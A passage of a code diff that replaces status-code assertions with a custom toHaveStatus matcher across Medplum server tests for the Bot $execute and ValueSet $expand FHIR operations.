@@ -418,7 +418,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken1)
       .send({});
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue[0].details.text).toStrictEqual('No executable code');
 
     // Update the bot with an invalid code URL
@@ -433,7 +433,7 @@ describe('Execute', () => {
           url: 'https://example.com/invalid.js',
         },
       });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     // Try to execute with invalid code URL
     // This should fail
@@ -442,7 +442,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken1)
       .send({});
-    expect(res4.status).toBe(400);
+    expect(res4).toHaveStatus(400);
     expect(res4.body.issue[0].details.text).toStrictEqual('Executable code is not a Binary');
 
     // Deploy the bot
@@ -462,7 +462,7 @@ describe('Execute', () => {
           };
       `,
       });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
 
     // Execute the bot success
     const res6 = await request(app)
@@ -471,7 +471,7 @@ describe('Execute', () => {
       .set('Authorization', 'Bearer ' + accessToken1)
       .set('Cookie', '__medplum-test-cookie=123')
       .send({});
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     expect(res6.body).toMatchObject({
       patient: 'Patient/123',
       bot: 'Bot/' + bot.id,
@@ -490,7 +490,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken1)
       .send({});
-    expect(res7.status).toBe(400);
+    expect(res7).toHaveStatus(400);
     expect(res7.body.issue[0].details.text).toStrictEqual('VM Context bots not enabled on this server');
 
     getConfig().vmContextBotsEnabled = true;
@@ -507,7 +507,7 @@ describe('Execute', () => {
         name: 'Test Bot',
         runtimeVersion: 'vmcontext',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const bot = res1.body as Bot;
 
     // Deploy the bot
@@ -522,7 +522,7 @@ describe('Execute', () => {
           };
       `,
       });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
 
     // Execute the bot success
     const res6 = await request(app)
@@ -530,7 +530,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken1)
       .send({});
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     expect(res6.body).toStrictEqual(42);
   });
 
@@ -541,7 +541,7 @@ describe('Execute', () => {
         .post(`/fhir/R4/Bot/${urlEnding}`)
         .set('Authorization', 'Bearer ' + accessToken1)
         .send('');
-      expect(res.status).toBe(404);
+      expect(res).toHaveStatus(404);
       expect(res.headers['content-type']).toBe('application/fhir+json; charset=utf-8');
       expect(res.body).toMatchObject(notFound);
     }
@@ -552,7 +552,7 @@ describe('Execute', () => {
       .post(`/fhir/R4/Bot/$execute`)
       .set('Authorization', 'Bearer ' + accessToken1)
       .send('');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.headers['content-type']).toBe('application/fhir+json; charset=utf-8');
     expect(res.body).toMatchObject(badRequest('Must specify bot ID or identifier.'));
   });
@@ -561,7 +561,7 @@ describe('Execute', () => {
     const res = await request(app)
       .get(`/fhir/R4/Bot/${bots.binaryBot.id}/$execute`)
       .set('Authorization', 'Bearer ' + accessToken1);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('text/plain; charset=utf-8');
     expect(res.text).toStrictEqual('Hello, world!');
   });
@@ -584,7 +584,7 @@ describe('Execute', () => {
         runtimeVersion: 'vmcontext',
         runAsUser: true,
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const bot = res1.body as Bot;
 
     // Deploy the bot
@@ -601,7 +601,7 @@ describe('Execute', () => {
           };
       `,
       });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
 
     // Execute the bot as self
     const res6 = await request(app)
@@ -609,7 +609,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken1)
       .send({});
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     const selfToken = parseJWTPayload(res6.body.token);
     expect(selfToken.profile).toMatch(/^ClientApplication\//);
 
@@ -620,7 +620,7 @@ describe('Execute', () => {
       .set('Authorization', 'Bearer ' + accessToken1)
       .set('X-Medplum-On-Behalf-Of', getReferenceString(membership))
       .send({});
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
     const membershipToken = parseJWTPayload(res7.body.token);
     expect(membershipToken.profile).toEqual(getReferenceString(profile));
 
@@ -631,7 +631,7 @@ describe('Execute', () => {
       .set('Authorization', 'Bearer ' + accessToken1)
       .set('X-Medplum-On-Behalf-Of', getReferenceString(membership))
       .send({});
-    expect(res8.status).toBe(200);
+    expect(res8).toHaveStatus(200);
     const profileToken = parseJWTPayload(res8.body.token);
     expect(profileToken.profile).toEqual(getReferenceString(profile));
   });
@@ -647,7 +647,7 @@ describe('Execute', () => {
         name: 'Test Bot',
         runtimeVersion: 'vmcontext',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const bot = res1.body as Bot;
 
     // Deploy the bot
@@ -662,7 +662,7 @@ describe('Execute', () => {
           };
       `,
       });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
 
     const traceId = randomUUID();
 
@@ -717,7 +717,7 @@ describe('Execute', () => {
         const res1 = await request(app)
           .get(`/fhir/R4/Project/${project2.id}`)
           .set('Authorization', 'Bearer ' + accessToken2);
-        expect(res1.status).toBe(200);
+        expect(res1).toHaveStatus(200);
         expect(res1.body.resourceType).toBe('Project');
         expect(res1.body.id).toBe(project2.id);
 
@@ -725,7 +725,7 @@ describe('Execute', () => {
         const res2 = await request(app)
           .get(`/fhir/R4/Project/${project1.id}`)
           .set('Authorization', 'Bearer ' + accessToken2);
-        expect(res2.status).toBe(200);
+        expect(res2).toHaveStatus(200);
         expect(res2.body.resourceType).toBe('Project');
         expect(res2.body.id).toBe(project1.id);
 
@@ -733,7 +733,7 @@ describe('Execute', () => {
         const res3 = await request(app)
           .get(`/fhir/R4/Bot/${bot.id}`)
           .set('Authorization', 'Bearer ' + accessToken2);
-        expect(res3.status).toBe(200);
+        expect(res3).toHaveStatus(200);
         expect(res3.body.resourceType).toBe('Bot');
         expect(res3.body.id).toBe(bot.id);
       }
@@ -795,7 +795,7 @@ describe('Execute', () => {
         .set('Content-Type', ContentType.TEXT)
         .set('Authorization', 'Bearer ' + accessToken)
         .send('input');
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.headers['content-type']).toBe('text/plain; charset=utf-8');
       expect(res.text).toStrictEqual('input');
 
@@ -834,7 +834,7 @@ describe('Execute', () => {
         .set('Content-Type', ContentType.TEXT)
         .set('Authorization', 'Bearer ' + accessToken)
         .send('input');
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.headers['content-type']).toBe('text/plain; charset=utf-8');
       expect(res.text).toStrictEqual('input');
 
@@ -856,7 +856,7 @@ describe('Execute', () => {
         .set('Authorization', 'Bearer ' + accessToken1)
         .set('Prefer', 'respond-async')
         .send('input');
-      expect(res.status).toBe(202);
+      expect(res).toHaveStatus(202);
 
       const job = await waitForAsyncJob(res.headers['content-location'], app, accessToken1);
       expect(job).toMatchObject<Partial<AsyncJob>>({
@@ -882,7 +882,7 @@ describe('Execute', () => {
         .set('Authorization', 'Bearer ' + accessToken1)
         .set('Prefer', 'respond-async')
         .send({ hello: 'medplum' });
-      expect(res.status).toBe(202);
+      expect(res).toHaveStatus(202);
 
       const job = await waitForAsyncJob(res.headers['content-location'], app, accessToken1);
       expect(job).toMatchObject<Partial<AsyncJob>>({
@@ -908,7 +908,7 @@ describe('Execute', () => {
         .set('Authorization', 'Bearer ' + accessToken1)
         .set('Prefer', 'respond-async')
         .send('input: true');
-      expect(res.status).toBe(202);
+      expect(res).toHaveStatus(202);
 
       const job = await waitForAsyncJob(res.headers['content-location'], app, accessToken1);
       expect(job).toMatchObject<Partial<AsyncJob>>({
@@ -934,7 +934,7 @@ describe('Execute', () => {
         .set('Authorization', 'Bearer ' + accessToken1)
         .set('Prefer', 'respond-async')
         .send('input');
-      expect(res.status).toBe(202);
+      expect(res).toHaveStatus(202);
 
       const job = await waitForAsyncJob(res.headers['content-location'], app, accessToken1);
       expect(job).toMatchObject<Partial<AsyncJob>>({
@@ -962,7 +962,7 @@ describe('Execute', () => {
         .set('Accept', 'text/event-stream')
         .set('Authorization', 'Bearer ' + accessToken1)
         .send('input');
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.headers['content-type']).toBe('text/event-stream');
 
       const events = res.text.split('\n\n').filter((e) => e.startsWith('data: '));
@@ -978,7 +978,7 @@ describe('Execute', () => {
         .set('Accept', 'text/event-stream')
         .set('Authorization', 'Bearer ' + accessToken1)
         .send({ message: 'hello' });
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.headers['content-type']).toBe('text/event-stream');
 
       const events = res.text.split('\n\n').filter((e) => e.startsWith('data: '));
@@ -996,7 +996,7 @@ describe('Execute', () => {
         .set('Accept', 'text/event-stream')
         .set('Authorization', 'Bearer ' + accessToken1)
         .send('input');
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.headers['content-type']).toBe('application/fhir+json; charset=utf-8');
     });
   });

--- a/packages/server/src/fhir/operations/expand.test.ts
+++ b/packages/server/src/fhir/operations/expand.test.ts
@@ -36,7 +36,7 @@ describe('Expand', () => {
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0].details?.text).toContain('Missing url');
   });
 
@@ -44,7 +44,7 @@ describe('Expand', () => {
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent('http://example.com/ValueSet/123')}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0].details?.text).toMatch(/^ValueSet .*not found$/);
   });
 
@@ -59,12 +59,12 @@ describe('Expand', () => {
         status: 'active',
         url,
       });
-    expect(res1.status).toStrictEqual(201);
+    expect(res1).toHaveStatus(201);
 
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(url)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0].details?.text).toMatch(
       /(^Missing ValueSet definition$)|(^No systems found$)/
     );
@@ -74,7 +74,7 @@ describe('Expand', () => {
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent('http://hl7.org/fhir/ValueSet/observation-codes')}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.expansion.contains.length).toBe(10);
     expect(res.body.expansion.contains[0].system).toBe(LOINC);
   });
@@ -87,7 +87,7 @@ describe('Expand', () => {
         )}&filter=a&filter=b`
       )
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0].details?.text).toContain('filter');
   });
 
@@ -99,7 +99,7 @@ describe('Expand', () => {
         )}&filter=%00a`
       )
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0].details?.text).toContain('null byte');
   });
 
@@ -111,7 +111,7 @@ describe('Expand', () => {
         )}&filter=rate`
       )
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.expansion.contains[0].system).toBe(LOINC);
     expect(res.body.expansion.contains[0].display).toMatch(/rate/i);
   });
@@ -124,7 +124,7 @@ describe('Expand', () => {
         )}&filter=blood&offset=1&count=1`
       )
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.expansion.contains.length).toBe(1);
     expect(res.body.expansion.contains[0].system).toBe(LOINC);
     expect(res.body.expansion.contains[0].display).toMatch(/blood/i);
@@ -135,7 +135,7 @@ describe('Expand', () => {
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet)}&filter=active`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject({
       resourceType: 'ValueSet',
       url: 'http://hl7.org/fhir/ValueSet/subscription-status',
@@ -162,7 +162,7 @@ describe('Expand', () => {
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet)}&filter=${encodeURIComponent(filter)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject({
       resourceType: 'ValueSet',
       url: valueSet,
@@ -192,7 +192,7 @@ describe('Expand', () => {
           )}&filter=${encodeURIComponent('intention - reported')}`
         )
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.body.expansion.contains[0].system).toBe(LOINC);
       expect(res.body.expansion.contains[0].display).toMatch(/pregnancy intention/i);
     }));
@@ -205,7 +205,7 @@ describe('Expand', () => {
         )}&filter=${encodeURIComponent('[')}`
       )
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('No null `display` field', async () => {
@@ -214,7 +214,7 @@ describe('Expand', () => {
         `/fhir/R4/ValueSet/$expand?url=${encodeURIComponent('http://hl7.org/fhir/ValueSet/care-plan-activity-kind')}`
       )
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const body = res.body as ValueSet;
     expect(body).toBeDefined();
@@ -260,13 +260,13 @@ describe('Expand', () => {
           ],
         },
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const url = res1.body.url;
 
     const res2 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(url)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.expansion.contains).toContainEqual({
       system: 'http://hl7.org/fhir/resource-types',
       code: 'Patient',
@@ -299,7 +299,7 @@ describe('Expand', () => {
       .post('/fhir/R4/CodeSystem')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(codeSystem);
-    expect(res1.status).toStrictEqual(201);
+    expect(res1).toHaveStatus(201);
     const res2 = await request(app)
       .post(`/fhir/R4/CodeSystem/$import`)
       .set('Authorization', 'Bearer ' + superAdminAccessToken)
@@ -312,7 +312,7 @@ describe('Expand', () => {
           { name: 'concept', valueCoding: { code: 'bar', display: 'Bar' } },
         ],
       });
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
 
     // Second version of code system
     codeSystem.version = '2';
@@ -320,7 +320,7 @@ describe('Expand', () => {
       .post('/fhir/R4/CodeSystem')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(codeSystem);
-    expect(res3.status).toStrictEqual(201);
+    expect(res3).toHaveStatus(201);
     const res4 = await request(app)
       .post(`/fhir/R4/CodeSystem/$import`)
       .set('Authorization', 'Bearer ' + superAdminAccessToken)
@@ -333,7 +333,7 @@ describe('Expand', () => {
           { name: 'concept', valueCoding: { code: 'quux', display: 'Quux' } },
         ],
       });
-    expect(res4.status).toStrictEqual(200);
+    expect(res4).toHaveStatus(200);
 
     // ValueSet containing all of target CodeSystem
     const res5 = await request(app)
@@ -347,13 +347,13 @@ describe('Expand', () => {
           include: [{ system: codeSystem.url }],
         },
       });
-    expect(res5.status).toStrictEqual(201);
+    expect(res5).toHaveStatus(201);
     const valueSet = res5.body as ValueSet;
 
     const res6 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet.url as string)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res6.status).toStrictEqual(200);
+    expect(res6).toHaveStatus(200);
   });
 
   test('ValueSet that uses expansion instead of compose', async () => {
@@ -392,13 +392,13 @@ describe('Expand', () => {
           ],
         },
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const url = res1.body.url;
 
     const res2 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(url)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.expansion.contains).toStrictEqual(
       expect.arrayContaining([
         {
@@ -428,7 +428,7 @@ describe('Expand', () => {
     const res3 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(url)}&filter=p`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.expansion.contains).toStrictEqual(
       expect.arrayContaining([
         {
@@ -459,12 +459,12 @@ describe('Expand', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(valueSet);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const res2 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet.url as string)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toStrictEqual(400);
+    expect(res2).toHaveStatus(400);
   });
 
   test('Subsumption', async () => {
@@ -473,7 +473,7 @@ describe('Expand', () => {
         `/fhir/R4/ValueSet/$expand?url=${encodeURIComponent('http://hl7.org/fhir/ValueSet/relatedperson-relationshiptype')}&count=200`
       )
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     expect(
@@ -508,13 +508,13 @@ describe('Expand', () => {
           ],
         },
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const url = res1.body.url;
 
     const res2 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(url)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue[0].details.text).toStrictEqual(
       'CodeSystem http://example.com/the-codesystem-does-not-exist not found'
     );
@@ -532,7 +532,7 @@ describe('Expand', () => {
         content: 'complete',
         concept: [{ code: '314159265', display: 'Test SNOMED override' }],
       });
-    expect(res1.status).toStrictEqual(201);
+    expect(res1).toHaveStatus(201);
 
     const res2 = await request(app)
       .post(`/fhir/R4/ValueSet`)
@@ -550,12 +550,12 @@ describe('Expand', () => {
           ],
         },
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     const res3 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(res2.body.url)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     const coding = res3.body.expansion.contains[0];
     expect(coding.system).toBe(SNOMED);
     expect(coding.code).toBe('314159265');
@@ -578,7 +578,7 @@ describe('Expand', () => {
       .set('Authorization', 'Bearer ' + a2)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ ...codeSystem, concept: [{ code: '1', display: 'Incorrect coding' }] });
-    expect(cs2.status).toStrictEqual(201);
+    expect(cs2).toHaveStatus(201);
 
     const { project: p1, accessToken: a1 } = await createTestProject({ withAccessToken: true });
     const cs1 = await request(app)
@@ -586,7 +586,7 @@ describe('Expand', () => {
       .set('Authorization', 'Bearer ' + a1)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ ...codeSystem, concept: [{ code: '1', display: 'Correct coding' }] });
-    expect(cs1.status).toStrictEqual(201);
+    expect(cs1).toHaveStatus(201);
 
     const { project: p3, accessToken: a3 } = await createTestProject({ withAccessToken: true });
     const cs3 = await request(app)
@@ -594,7 +594,7 @@ describe('Expand', () => {
       .set('Authorization', 'Bearer ' + a3)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ ...codeSystem, concept: [{ code: '1', display: 'Another incorrect coding' }] });
-    expect(cs3.status).toStrictEqual(201);
+    expect(cs3).toHaveStatus(201);
 
     accessToken = await initTestAuth({
       project: {
@@ -612,12 +612,12 @@ describe('Expand', () => {
         url: 'https://example.com/' + randomUUID(),
         compose: { include: [{ system: url }] },
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     const res3 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(res2.body.url)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     const coding = res3.body.expansion.contains[0];
     expect(coding.system).toBe(url);
     expect(coding.code).toBe('1');
@@ -641,7 +641,7 @@ describe('Expand', () => {
           { code: 'B', display: 'Concept B' },
         ],
       });
-    expect(csRes.status).toBe(201);
+    expect(csRes).toHaveStatus(201);
 
     const vsUrl = 'http://example.com/vs-fragment-' + randomUUID();
     const vsRes = await request(app)
@@ -656,12 +656,12 @@ describe('Expand', () => {
           include: [{ system: csUrl, concept: [{ code: 'A', display: 'Concept A' }] }],
         },
       });
-    expect(vsRes.status).toBe(201);
+    expect(vsRes).toHaveStatus(201);
 
     const expandRes = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(vsUrl)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(expandRes.status).toBe(200);
+    expect(expandRes).toHaveStatus(200);
     expect(expandRes.body.expansion.contains).toHaveLength(1);
     expect(expandRes.body.expansion.contains[0].code).toBe('A');
     expect(expandRes.body.expansion.contains[0].display).toBe('Concept A');
@@ -680,7 +680,7 @@ describe('Expand', () => {
         hierarchyMeaning: 'grouped-by',
         concept: [{ code: 'A', concept: [{ code: 'B' }] }],
       });
-    expect(res1.status).toStrictEqual(201);
+    expect(res1).toHaveStatus(201);
 
     const res2 = await request(app)
       .post(`/fhir/R4/ValueSet`)
@@ -699,12 +699,12 @@ describe('Expand', () => {
           ],
         },
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     const res3 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(res2.body.url)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body.issue[0].details.text).toMatch(/invalid filter/i);
   });
 
@@ -755,28 +755,28 @@ describe('Expand', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send(codeSystem);
-      expect(csRes.status).toBe(201);
+      expect(csRes).toHaveStatus(201);
 
       const vsRes1 = await request(app)
         .post(`/fhir/R4/ValueSet`)
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send(isaValueSet);
-      expect(vsRes1.status).toBe(201);
+      expect(vsRes1).toHaveStatus(201);
 
       const vsRes2 = await request(app)
         .post(`/fhir/R4/ValueSet`)
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send(descendentValueSet);
-      expect(vsRes2.status).toBe(201);
+      expect(vsRes2).toHaveStatus(201);
     });
 
     test('Includes ancestor code in is-a filter', async () => {
       const res = await request(app)
         .get(`/fhir/R4/ValueSet/$expand?url=${isaValueSet.url}`)
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res.status).toStrictEqual(200);
+      expect(res).toHaveStatus(200);
       const expansion = res.body.expansion as ValueSetExpansion;
 
       const system = codeSystem.url;
@@ -794,7 +794,7 @@ describe('Expand', () => {
       const res = await request(app)
         .get(`/fhir/R4/ValueSet/$expand?url=${isaValueSet.url}&filter=chi`)
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res.status).toStrictEqual(200);
+      expect(res).toHaveStatus(200);
       const expansion = res.body.expansion as ValueSetExpansion;
 
       const system = codeSystem.url;
@@ -808,7 +808,7 @@ describe('Expand', () => {
       const res = await request(app)
         .get(`/fhir/R4/ValueSet/$expand?url=${descendentValueSet.url}`)
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res.status).toStrictEqual(200);
+      expect(res).toHaveStatus(200);
       const expansion = res.body.expansion as ValueSetExpansion;
 
       const system = codeSystem.url;
@@ -825,7 +825,7 @@ describe('Expand', () => {
       const res = await request(app)
         .get(`/fhir/R4/ValueSet/$expand?url=${descendentValueSet.url}&filter=pet`)
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res.status).toStrictEqual(200);
+      expect(res).toHaveStatus(200);
       const expansion = res.body.expansion as ValueSetExpansion;
 
       const system = codeSystem.url;
@@ -840,7 +840,7 @@ describe('Expand', () => {
         `/fhir/R4/ValueSet/$expand?url=${encodeURIComponent('http://hl7.org/fhir/ValueSet/relatedperson-relationshiptype')}&count=200`
       )
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     const v2Codes = expansion.contains?.filter((c) => c.system === 'http://terminology.hl7.org/CodeSystem/v2-0131');
@@ -857,7 +857,7 @@ describe('Expand', () => {
         `/fhir/R4/ValueSet/$expand?url=${encodeURIComponent('http://hl7.org/fhir/ValueSet/relatedperson-relationshiptype')}&filter=adopt&count=200`
       )
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     const expandedCodes = expansion.contains?.map((coding) => coding.code);
@@ -873,7 +873,7 @@ describe('Expand', () => {
         `/fhir/R4/ValueSet/$expand?url=${encodeURIComponent('http://hl7.org/fhir/ValueSet/relatedperson-relationshiptype')}&count=200&excludeNotForUI=true`
       )
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const expansion = res.body.expansion as ValueSetExpansion;
 
     expect(
@@ -902,12 +902,12 @@ describe('Expand', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(valueSet);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const res2 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet.url as string)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     const expansion = res2.body.expansion as ValueSetExpansion;
     expect(expansion.contains).toHaveLength(1);
     expect(expansion.contains?.[0]?.code).toStrictEqual('ERECCAP');
@@ -932,12 +932,12 @@ describe('Expand', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(valueSet);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const res2 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet.url as string)}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     const expansion = res2.body.expansion as ValueSetExpansion;
     expect(expansion.contains).toHaveLength(1);
     expect(expansion.contains?.[0]?.code).toStrictEqual('ERECCAP');
@@ -962,12 +962,12 @@ describe('Expand', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(valueSet);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const res2 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${valueSet.url}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     const expansion = res2.body.expansion as ValueSetExpansion;
     // Only one code in the set has a `status` property
     expect(expansion.contains).toHaveLength(1);
@@ -993,12 +993,12 @@ describe('Expand', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(valueSet);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const res2 = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${valueSet.url}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     const expansion = res2.body.expansion as ValueSetExpansion;
     expect(expansion.contains).toHaveLength(160);
     expect(expansion.contains?.find((c) => c.code === 'ERECCAP')).toBeUndefined();
@@ -1033,13 +1033,13 @@ describe('Expand', () => {
       .post('/fhir/R4/ValueSet')
       .set('Authorization', 'Bearer ' + accessToken)
       .send(valueSetResource);
-    expect(valueSetRes.status).toStrictEqual(201);
+    expect(valueSetRes).toHaveStatus(201);
     const valueSet = valueSetRes.body as ValueSet;
 
     const res = await request(app)
       .get(`/fhir/R4/ValueSet/$expand?url=${encodeURIComponent(valueSet.url as string)}&count=200`)
